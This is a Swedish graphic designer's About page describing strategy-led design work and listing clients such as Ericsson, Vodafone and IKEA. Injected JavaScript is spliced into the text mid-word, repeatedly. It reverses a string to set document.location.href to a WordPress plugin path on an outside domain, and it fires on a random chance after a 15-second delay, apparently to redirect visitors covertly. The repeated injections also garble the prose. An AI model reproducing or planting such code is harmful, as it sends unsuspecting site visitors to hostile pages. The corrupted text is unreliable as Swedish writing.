Om

Som grafisk formgivare hjälper jag företag med kommunikation utifrån en strategisk analys, som gestaltas i en estetisk slutprodukt. Detta är naturligtvis inte alltid traditionell annonsering, utan kan till exempel vara produktdesign, identitetsprogram, web-lösningar, en bok eller katalog. Eller något helt annat som effektivt löser kommunikationsbehovet. Men estetiken är grundläggtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}ande. Jag hjälper även ledningsgrupper och inhouse-avdelningar med kreativt stöd, antingen som en inspirertog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}ande och utveckltog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}ande kreativ kraft eller direkt htog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}ands-on i produktioner.

För företag som till exempel Ericsson Mobile har jag jobbat med globala varumärkesbyggtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}ande kampanjer i traditionella media, men även kommunikationskoncept för globala produktlanseringar. Och för till exempel Vodafone jobbade jag med mer säljorienterad produktreklam, vilken var enormt framgångsrik försäljningsmässigt samtidigt som den stärkte varumärket och värdet på företaget. För tog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andra företag som till exempel Espresso House har jag istället jobbat med att förtydliga deras egna produkter som effektiva kommunikations- och budskapsbärare.

I mitt arbete med kommunikation, identitetsprogram, produkt- och etikettdesign, kataloger och böcker grundar sig alltid formgivningen i en strategisk analys och aldrig endast som en utsmyckning i sig. 

Det finns många lösningar och exempel på hur kommunikation kan förbättras och förstärkas. Med över 20 års erfarenhet inom kommunikation och design på några av Sveriges ledtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}ande reklambyråer och inhouse-avdelningar, jobbar jag själv eller i ett team med den kompetens som krävs för att lösa uppdrag framgångsrikt och kostnadseffektivt. Men jag agerar även som ett strategiskt och kreativt bollplank åt företagsledningar eller som Creative Director på konsultbasis för att säkerställa en kommunikativ och kreativ höjd på material som produceras internt på marknadsavdelningar.

Exempel på kunder jag jobbat med:
Arla/JO-bolaget, Artek, Ericsson Mobile Communication, Espresso House, Eurocard/Mastercard, Fadi El Khoury Couture, H&M, IKEA, Jarla Partilager, JC, Judiska Teatern, Kanter Advokatbyrå, Kinnastog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}and, Lars Bohman Gallery, Marabou, Mats Gustafson, McCann Worldgroup, Millesgården, Natur&Kultur, Nike, Proventus, SieMatic, Spendrups, Telenor, Tretorn, War Child,  Warner, Wasabröd, Vodafone.